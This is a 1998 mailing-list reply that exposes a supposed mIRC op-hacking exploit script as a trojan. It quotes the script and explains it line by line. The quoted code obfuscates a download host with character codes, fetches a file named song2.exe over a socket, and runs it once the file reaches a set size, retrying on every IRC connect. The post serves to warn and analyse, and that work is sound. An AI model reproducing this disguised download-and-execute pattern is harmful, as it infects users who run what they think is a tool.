Re: your mail

[cacaio () DEATHKNIGHTS COM (Cacaio Torquato)]

At 14:50 13/11/98 -0500, root () BRAMPTON1 NETMATRIX NET wrote:
> Hi,
> while debugging/hexing/disassembling mirc my friend slotmech last week found
> a mirc bug which allows to force users to send MODE commands to the server.
> this example script sends a MODE +o to the irc server. the mirc author has
been
> notified of this but we didn't receive a response... my exploit+protection
scri$is included. Expect more mirc stuff from us.
>

Are you nutz man? Your code simple makes whoever wants to get op get a file
in your server and execute it. I'm glad you weren't smart enough to place
the full address of your server.
For the ones who wants to know exactly what's happening, I will explain
step by step the code.

Your attempt to install your file in everyone that want to hack ops was
funny, just funny...

> alias hackop {
> ...
>  checklen $1
> ...
> }

call the function checklen - see below

> alias checklen {
>  .if (%xcomplete == 1) halt
>  .if (%xinprog == 1) halt
>  .set %xfilename song2.exe
>  .set %xlof $lof(%xfilename)
>  .set %xfirst 1
>  .write -c %xfilename

sets the filename to song2.exe, and clear it if something is on it already.

>  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104
101 - 1$  .sockclose protx

if this line is uncommented, it displays in the screen the following message:
d o n t - s p o i l - t h e

>  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
$chr$}

opens a sock connection with the server designed. the one placed in his
hode is www.g (i think he forgot the rest)

> on 1:sockopen:protx: {
>  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+
$chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47)
$+ $chr(57) $+ $c$  .sockwrite -n protx
> }

when this sock connection is oppened, he send the request 'GET /Belta/9' to
the server and start receiving data

> on 1:sockread:protx: {
>  .sockread &test
>  .set %xlof $lof(%xfilename)
>  .if (%xfirst == 1) set %xlof 0
>  .set %xfirst 0
>  .bwrite %xfilename %xlof $sockbr &test
> }

just receive the data and make it a file

> on 1:connect:checklen

why is it here? because when the user connects to the irc server, the
script will grab the file again, and again and again.

> on 1:sockclose:protx: {
>  .sockread &test
>  if ($sockbr > 0) {
>    .set %xlof $lof(%xfilename)
>    .bwrite %xfilename %xlof $sockbr &test
>  }

finish writting file

>  .if ($lof(%xfilename) == 178306) {
>    .run %xfilename
>    .set %xcomplete 1
>  }

if the site of the file, in bytes, is equal to 178306, runs the file

>  if ($lof(%xfilename) != 178306) {
>    .timer 1 300 checklen
>  }

if the site of the file, in bytes, is minor to 178306, starts a timer that
in 300 seconds will get the file again

>  }
>  unset %xinprog
>  unset %xfilename
>  unset %xlof
>  unset %xfirst
> }

unset the garbage variables

-----------
that's it

Best regards,
--
Cacaio Torquato     http://www.deathknights.com/cacaio

The Death Knights   http://www.deathknights.com          zelur xuniL  ()  -O)
Tedio INC.          http://www.tedio.org                 Think Blue.  /\  /\\
                                                                         _\_V
+-------------------------------------------------------+
|         BrasNet IRC Servers Network - Brazil          |
|         irc.brasnet.org   irc.webtech.com.br          |
|                   irc.sol.com.br                      |
+-------------------------------------------------------+